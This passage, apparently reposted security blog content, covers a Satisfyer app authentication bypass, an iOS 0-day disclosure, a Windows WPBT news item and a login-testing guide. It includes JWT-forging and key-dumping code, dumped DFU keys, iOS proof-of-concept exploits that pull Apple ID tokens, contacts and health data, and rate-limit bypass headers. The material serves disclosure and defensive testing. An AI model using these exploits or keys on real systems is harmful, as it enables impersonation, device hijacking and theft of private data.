    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject token into shared preferences and add bogus values to make the app happy
    this.setToken(token);
    this.setLogin("victim[...]");
    this.setPassword("NotReallyThePassword");
    return this.hasToken();
}

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.


To summarize, the impact of this is quite interesting, since an attacker can now pose as any given user. In addition to the ability to send messages as that user, access to the friends list of the compromised account becomes possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes that their account is being impersonated, even changing the password doesn’t help, since the attack doesn’t require the password to be known in the first place.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.


Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than ROLE_ANONYMOUS_CLIENT, should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.
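As a sketch of this two-key scheme (the key values and function names are hypothetical, not Satisfyer’s actual server code), the server-side verifier would pick the verification key based on the claimed role, so the key embedded in the app can no longer mint ROLE_USER tokens:

```python
import base64
import hashlib
import hmac
import json

# Hypothetical keys: the anonymous-client key ships inside the app,
# while the user key would exist only on the server.
ANON_KEY = b"key-embedded-in-the-app"
USER_KEY = b"key-that-never-leaves-the-server"

def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def verify_jwt(token: str) -> dict:
    signing_input, _, signature = token.rpartition(".")
    payload = json.loads(_b64url_decode(signing_input.split(".")[1]))
    # Tokens claiming anything beyond ROLE_ANONYMOUS_CLIENT must verify
    # against the server-only key.
    key = ANON_KEY if payload.get("auth") == "ROLE_ANONYMOUS_CLIENT" else USER_KEY
    expected = hmac.new(key, signing_input.encode(), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, _b64url_decode(signature)):
        raise ValueError("invalid signature")
    return payload
```

With this split, a key extracted from the app can only ever produce anonymous tokens.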

Dumping the JWT Signing Key

For completeness’ sake, I’ve dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.
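With a dumped key in hand, building such a token needs nothing beyond the Python standard library. A sketch with a placeholder key and victim data (not the real values):

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_user_jwt(signing_key: bytes, username: str, user_id: int) -> str:
    # header and payload mirror the tokens shown earlier
    header = b64url(json.dumps({"alg": "HS512"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps({
        "sub": username,        # victim's account name instead of "Satisfyer"
        "auth": "ROLE_USER",    # elevated from ROLE_ANONYMOUS_CLIENT
        "user_id": user_id,
        "exp": int(time.time()) + 86400,
    }, separators=(",", ":")).encode())
    signing_input = header + "." + payload
    signature = hmac.new(signing_key, signing_input.encode(), hashlib.sha512).digest()
    return signing_input + "." + b64url(signature)

# placeholder values only
print(forge_user_jwt(b"0123456789abcdef", "victim", 282000000))
```

This reproduces offline what the Frida hooks did inside the app.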

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A libnative-lib.so
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[...]
[0x000009bc]> afl
[...]
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[...]
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366
[...]

As you can see, a static key is loaded from address 0x843.

That was too easy, let’s check other methods to dump the key.

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method getReleaseKey() is declared as native. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the native Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida Interceptor to print the value returned by the getReleaseKey() export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("libnative-lib.so", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"),{
    onEnter: hookEnter,
    onLeave: hookLeave
});


function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");
}

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");
    console.log(ret);

    /*
    // if it would return a byte[] instead of String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for(var i = 0; i < buffer.length; ++i){
        result += (String.fromCharCode(buffer[i]));
    }*/
}

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the x1 register at offset 0xb4c are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset 0xb4c to this address
  • Add a trace command for this address to dump the contents of the x1 register
  • Trigger the key generation

Let’s see how it works:

After triggering the generation of a JWT, tracing kicks in and dumps the value of x1, which is a pointer to the hardcoded string.


As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.

This sounds different from what the Satisfyer app is currently doing, since it uses an admin account with a static password. In fact, coturn servers offer a web interface, reachable only via HTTPS, that allows admin users to log in. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let’s just hope this panel is not accessible, right? RIGHT?
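For comparison, the temporary-credential scheme quoted from the coturn readme derives short-lived credentials from a shared secret held by the server: the username embeds an expiry timestamp, and the password is an HMAC-SHA1 over that username. A rough stdlib sketch (the function name and parameters are mine):

```python
import base64
import hashlib
import hmac
import time

def turn_rest_credentials(shared_secret: bytes, user_id: str, ttl: int = 3600):
    # username encodes the expiry timestamp; the relay rejects it once expired
    username = "%d:%s" % (int(time.time()) + ttl, user_id)
    # password = base64(HMAC-SHA1(shared secret, username))
    password = base64.b64encode(
        hmac.new(shared_secret, username.encode(), hashlib.sha1).digest()
    ).decode()
    return username, password
```

The relay recomputes the same HMAC from its own copy of the secret, so no persistent password is ever stored or shipped in the app.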

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something onto a test device is a firmware package from the vendor. Unfortunately, all of my Satisfyer devices were shipped to me with up-to-date firmware already installed. There’s an API endpoint that allows downloading firmware images, but it requires brute-forcing various parameter values, and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I’ve found a way to trigger the update process, that is, calling updateFirmware(path) of the class ToyHolderController. A great way to see what’s actually going on is to place hooks in the classes used for logging purposes. In the case of Satisfyer Connect, the ZLogger class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
(1)01
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED

Based on the debug messages, I’ve started to build a file that can be flashed onto the device. I lost interest shortly after, but in case my results are helpful to anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

# build the file as bytes so raw values like \x8e aren't mangled by text encoding
FILE = b""

# header
FILE += b"\x47\x4D"

# sizeOfMergedFile
FILE += b"\x3e\x00\x00\x00"

FILE += b"CCDDXXFFGGHHIIJJKKLLMMNNOOPPQQRR"

# extension
FILE += b"\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += b"\x01\x00\x00\x00"

# start addr
FILE += b"\x10\x00"

# download addr
FILE += b"\x10\x00"

FILE += b"\x05\x00\x00\x00"

FILE += b"ZZaa"

### image file 1

# ic version
FILE += b"\x05"

# secure version
FILE += b"\x00"

# no idea
FILE += b"\x13\x37"

# image id
FILE += b"\x01\x01"

# crc16
FILE += b"\x8e\x04"

# size
FILE += b"\x40\x00\x00\x00"

# image payload
FILE += b"A" * 0x40

# write in binary mode, otherwise the bytes would be re-encoded as UTF-8
with open("./thefile.bin", "wb") as f:
    f.write(FILE)

If anybody happens to have a flashable Satisfyer .bin file lying around, I’ll offer $13.37 PayPal for it, I swear.


Timeline

  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to security@satisfyer.com.
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to security@satisfyer.com.
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to security@satisfyer.com and app.support@satisfyer.com.
  • 06/30/2021: Received acknowledgement; agreed that the blog post would be released in at most two weeks, or earlier if the vulnerability was fixed before then.
  • 07/14/2021: Publishing blog post.

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Original text by Denis Tokarev @illusionofchaos

I want to share my frustrating experience participating in the Apple Security Bounty program. I’ve reported four 0-day vulnerabilities this year between March 10 and May 4; as of now, three of them are still present in the latest iOS version (15.0), and one was fixed in 14.7, but Apple decided to cover it up and not list it on the security content page. When I confronted them, they apologized, assured me it happened due to a processing issue, and promised to list it on the security content page of the next update. There have been three releases since then, and they broke their promise each time.

Ten days ago I asked for an explanation and warned them that I would make my research public if I didn’t receive one. My request was ignored, so I’m doing what I said I would. My actions are in accordance with responsible disclosure guidelines (Google Project Zero discloses vulnerabilities 90 days after reporting them to the vendor, ZDI after 120). I have waited much longer, up to half a year in one case.

I’m not the first person that is unhappy with Apple Security Bounty program. Here are some other reports and opinions:

Here are links to GitHub repositories that contain PoC source code that I’ve sent to Apple. Each repository contains an app that gathers sensitive information and presents it in the UI.

Gamed 0-day

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows access to at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, metadata about all of the user’s interactions with these contacts (including timestamps and statistics), and some attachments, such as URLs and texts)
  • Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creation and modification dates (I’ve just checked on iOS 15 and this one is inaccessible, so it must have been quietly fixed recently)

Here is a short proof of concept (this one won’t actually compile, see GitHub repo for a workaround).

let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
    }

    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
    }
}

How it happens:

  • XPC service com.apple.gamed doesn’t properly check for the com.apple.developer.game-center entitlement
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
  • If Game Center is enabled on the device (even if it’s not enabled for the app in App Store Connect and the app doesn’t contain the com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing the user’s Apple ID, DSID, and Game Center authentication token (which allows sending requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing the first and last name of the user’s Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService returns an object with information about the user’s friends in Game Center.
  • Even if Game Center is disabled, not enabled for the app in App Store Connect, and the app doesn’t contain the com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows reading arbitrary files outside of the app sandbox by passing file URLs to that method. The files that can be accessed this way include (but are not limited to) the following:
    /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist — contains the mobile gestalt cache
    /var/mobile/Library/CoreDuet/People/interactionC.db — contains a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps and metadata about the user’s interaction with these contacts (including timestamps and statistics)
    /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist — contains favorite contacts and their phone numbers
    /var/mobile/Library/AddressBook/AddressBook.sqlitedb — contains the complete Address Book database
    /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb — contains photos of Address Book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow writing arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page, this vulnerability is evaluated at $100,000 (broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox; «sensitive data» access includes gaining broad access (i.e., the full database) to Contacts).

Nehelper Enumerate Installed Apps 0-day

The vulnerability allows any user-installed app to determine whether any other app is installed on the device, given its bundle ID.

XPC endpoint com.apple.nehelper has a method, accessible to any app, that accepts a bundle ID as a parameter and returns an array containing some cache UUIDs if an app with a matching bundle ID is installed on the device, or an empty array otherwise. This happens in -[NEHelperCacheManager onQueueHandleMessage:] in /usr/libexec/nehelper.

func isAppInstalled(bundleId: String) -> Bool {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)!
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
    xpc_dictionary_set_uint64(xdict, "cache-command", 3)
    xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Nehelper Wifi Info 0-day

XPC endpoint com.apple.nehelper accepts a user-supplied parameter sdk-version, and if its value is less than or equal to 524288, the com.apple.developer.networking.wifi-info entitlement check is skipped. This makes it possible for any qualifying app (e.g. one possessing location access authorization) to gain access to Wi-Fi information without the required entitlement. This happens in -[NEHelperWiFiInfoManager checkIfEntitled:] in /usr/libexec/nehelper.

func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}

Analyticsd (fixed in iOS 14.7)

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day… and Analytics-Daily…). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rhythm events)
  • menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user’s action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That’s why it’s very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if «Share analytics» was turned off in settings.

func analytics_json() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    return xpc_dictionary_get_string(reply, "log-dump")
}

Timeline:

April 29 2021 — I sent a detailed report to Apple

April 30 2021 — Apple replied that they had reviewed the report and were investigating

May 20 2021 — I’ve requested a status update from Apple (and received no reply)

May 30 2021 — I’ve requested a status update from Apple

June 3 2021 — Apple replied that they plan to address the issue in the upcoming update

July 19 2021 — iOS 14.7 is released with the fix

July 20 2021 — I’ve requested a status update from Apple

July 21 2021 — iOS 14.7 security contents list is published, this vulnerability is not mentioned

July 22 2021 — I asked Apple why the vulnerability was not on the list. The same day, I received the following reply: «Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience.»

July 26 2021 — iOS 14.7.1 security contents list is published, still no mention of this vulnerability

September 13 2021 — iOS 14.8 security contents list is published, still no mention of this vulnerability. The same day, I asked for an explanation and informed Apple that I would make all my research public unless I received a reply soon

September 20 2021 — iOS 15.0 security contents list is published, still no mention of this vulnerability

September 24 2021 — I still haven’t received any reply so I publish this article

UPDATE:

September 25 2021 — exactly 24 hours after this publication, I finally received a reply from Apple. Here is what it said:

We saw your blog post regarding this issue and your other reports. We apologize for the delay in responding to you.

We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance. 

Please let us know if you have any questions.

A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit

A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit

Original text by Ravie Lakshmanan

Security researchers have disclosed an unpatched weakness in Microsoft Windows Platform Binary Table (WPBT) affecting all Windows-based devices since Windows 8 that could be potentially exploited to install a rootkit and compromise the integrity of devices.

«These flaws make every Windows system vulnerable to easily-crafted attacks that install fraudulent vendor-specific tables,» researchers from Eclypsium said in a report published on Monday. «These tables can be exploited by attackers with direct physical access, with remote access, or through manufacturer supply chains. More importantly, these motherboard-level flaws can obviate initiatives like Secured-core because of the ubiquitous usage of ACPI [Advanced Configuration and Power Interface] and WPBT.»

WPBT, introduced with Windows 8 in 2012, is a feature that enables «boot firmware to provide Windows with a platform binary that the operating system can execute.»

In other words, it allows PC manufacturers to point to signed portable executables or other vendor-specific drivers that come as part of the UEFI firmware ROM image in such a manner that it can be loaded into physical memory during Windows initialization and prior to executing any operating system code.

The main objective of WPBT is to allow critical features such as anti-theft software to persist even in scenarios where the operating system has been modified, formatted, or reinstalled. But given the functionality’s ability to have such software «stick to the device indefinitely,» Microsoft has warned of potential security risks that could arise from misuse of WPBT, including the possibility of deploying rootkits on Windows machines.

«Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions,» the Windows maker notes in its documentation. «In particular, WPBT solutions must not include malware (i.e., malicious software or unwanted software installed without adequate user consent).»

The vulnerability uncovered by the enterprise firmware security company is rooted in the fact that the WPBT mechanism can accept a signed binary with a revoked or an expired certificate to completely bypass the integrity check, thus permitting an attacker to sign a malicious binary with an already available expired certificate and run arbitrary code with kernel privileges when the device boots up.

In response to the findings, Microsoft has recommended using a Windows Defender Application Control (WDAC) policy to tightly control what binaries can be permitted to run on the devices.

The latest disclosure follows a separate set of findings in June 2021, which involved a set of four vulnerabilities — collectively called BIOS Disconnect — that could be weaponized to gain remote execution within the firmware of a device during a BIOS update, further highlighting the complexity and challenges involved in securing the boot process.

«This weakness can be potentially exploited via multiple vectors (e.g., physical access, remote, and supply chain) and by multiple techniques (e.g., malicious bootloader, DMA, etc),» the researchers said. «Organizations will need to consider these vectors, and employ a layered approach to security to ensure that all available fixes are applied and identify any potential compromises to devices.»

10 Most Common Security Issues Found in Login Functionalities

10 Most Common Security Issues Found in Login Functionalities

Original text by Harsh Bothra

During penetration testing and vulnerability assessment, the login functionalities are often encountered in some way or another. Most of the time, they are public-facing login portals where any user can attempt to log in to gain access to their accounts; on the other hand, sometimes, these login panels are restricted to specific users. The login functionality acts as a gateway that you need to unlock successfully to further access the application to its full potential. From a threat actor’s perspective, the login functionality is the main barrier to gain an initial foothold. Hence, it is essential from a penetration tester’s perspective to ensure that the login functionality implemented in the application is robust and secure against all types of vulnerabilities and misconfigurations.

This blog will discuss the common vulnerabilities and misconfigurations that a threat actor can exploit against login functionality, along with some remediations for each.

Vulnerability Test Cases

Default Credentials

Admin panels, third-party software integrations, and similar components often ship with a pair of default credentials that are left unchanged. This allows an attacker to identify the third-party service and look up its default credentials. These credentials usually belong to privileged admin users and may allow an attacker to gain a complete foothold in the application.

Default Credentials List: https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials

For example, an admin panel using default credentials such as “admin:admin” is easy to guess and may allow an attacker to gain access to the respective admin panel as the highest privileged user.
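A check for this can be sketched as a small script that walks a list of well-known default pairs. The target URL, the form field names (`username`/`password`), and the success heuristic are all assumptions here, so adjust them to the application under test:

```python
# Minimal sketch of a default-credential check (stdlib only).
import urllib.error
import urllib.parse
import urllib.request

# A small subset of the SecLists default-credential list linked above.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "root"),
    ("administrator", "administrator"),
]

def looks_successful(status_code: int, body: str) -> bool:
    """Heuristic: a redirect or a post-login keyword usually signals success.
    (urlopen follows redirects, so the keyword is the more reliable signal.)"""
    return status_code in (301, 302, 303) or "dashboard" in body.lower()

def try_default_logins(login_url: str):
    """Return the first default pair that appears to log in, else None."""
    for user, password in DEFAULT_CREDS:
        data = urllib.parse.urlencode(
            {"username": user, "password": password}).encode()
        try:
            with urllib.request.urlopen(
                    urllib.request.Request(login_url, data=data)) as resp:
                if looks_successful(resp.status,
                                    resp.read().decode(errors="replace")):
                    return user, password
        except urllib.error.HTTPError:
            continue  # 4xx/5xx responses mean the attempt failed
    return None
```

In practice, you would replace `looks_successful` with whatever distinguishes a real login on the specific target, such as a redirect to a known dashboard path.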

Remediation: To remediate this issue, the developers need to ensure that the default credentials are disabled/changed and a strong pair of non-guessable credentials are enforced.

User Enumeration

In many applications, when a user provides an invalid username, the application responds with a verbose error message stating that the user doesn't exist. There are several ways to identify valid usernames, such as:

  1. Error Message: Difference in the error message when a valid/invalid user name is provided.
  2. Timing Difference: Difference in server response timing when a valid/invalid user name is provided.
  3. Application-Specific Behaviour: In specific scenarios, there may be behaviour patterns that are specific to the application’s implemented login flow, and it may require additional observation to conclude if a user exists or not.

These issues may allow a threat actor to enumerate all the valid users of the application and use them to perform targeted attacks such as brute-forcing and social engineering.
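The two observable signals above (error-message differences and timing differences) can be probed with a short script. The form field names and the 0.3-second timing threshold are assumptions for illustration:

```python
# Sketch: probe a login form with a known-valid and a known-invalid username
# and compare the responses for enumeration signals.
import time
import urllib.parse
import urllib.request

def probe(login_url: str, username: str):
    """POST a login attempt with a dummy password; return (body, elapsed seconds)."""
    data = urllib.parse.urlencode(
        {"username": username, "password": "invalid-Pass-123"}).encode()
    start = time.perf_counter()
    with urllib.request.urlopen(
            urllib.request.Request(login_url, data=data)) as resp:
        body = resp.read().decode(errors="replace")
    return body, time.perf_counter() - start

def likely_enumerable(body_valid, t_valid, body_invalid, t_invalid,
                      time_delta=0.3):
    """Flag enumeration if the error messages differ or the timing gap
    exceeds the (assumed) threshold."""
    return body_valid != body_invalid or abs(t_valid - t_invalid) > time_delta
```

A real assessment would average timings over many requests, since a single sample is dominated by network jitter.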

Remediation: To remediate this issue, the developers need to implement proper handling so that the application doesn’t reveal any verbose error message on a valid/invalid username. Only a generic message is displayed. Similarly, the timing difference should not be significant enough to allow user enumeration.

Missing Brute-Force Protection

Most of the time, login pages are accessible to the world, and the application allows any user to register and log in. This increases the chance that some user has chosen a weak or guessable password. If an application allows login attempts regardless of how many have already failed, it gives a threat actor a window of opportunity to perform a brute-force attack and guess a victim user's password.

Bypass Methods: Often the application implements a rate-limiting or CAPTCHA mechanism to restrict brute-force attempts; however, there are multiple methods to bypass such an implementation, including but not limited to:

  1. Using various HTTP request headers such as those listed below. You can find the top headers in the dataset from Project Resonance Wave 2.
    • X-Originating-IP: 127.0.0.1
    • X-Forwarded-For: 127.0.0.1
    • X-Remote-IP: 127.0.0.1
    • X-Remote-Addr: 127.0.0.1
    • X-Client-IP: 127.0.0.1
    • X-Host: 127.0.0.1
    • X-Forwarded-Host: 127.0.0.1
  2. Using null bytes (%00) in the vulnerable parameters
  3. Sending the request without captcha parameter
  4. Adding fake parameters with the same “key”:”value”
  5. Limiting the threads or checking for race conditions
  6. Changing user-agents, cookies, and IP address
  7. Using IP rotation Burp Extensions to bypass IP based restrictions
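Technique 1 above can be automated by attaching a fresh spoofed client IP to every request, so a rate limiter keyed on these headers sees each attempt as a new client. A minimal generator for such header sets (header names taken from the list above) might look like:

```python
# Sketch: yield a new set of IP-spoofing headers per request, for testing
# whether the target's rate limiter trusts client-supplied headers.
import random

SPOOF_HEADERS = [
    "X-Originating-IP", "X-Forwarded-For", "X-Remote-IP",
    "X-Remote-Addr", "X-Client-IP", "X-Host", "X-Forwarded-Host",
]

def spoofed_header_sets():
    """Infinite generator: each item is a dict mapping every spoofable
    header to the same freshly randomised IPv4 address."""
    while True:
        ip = ".".join(str(random.randint(1, 254)) for _ in range(4))
        yield {name: ip for name in SPOOF_HEADERS}
```

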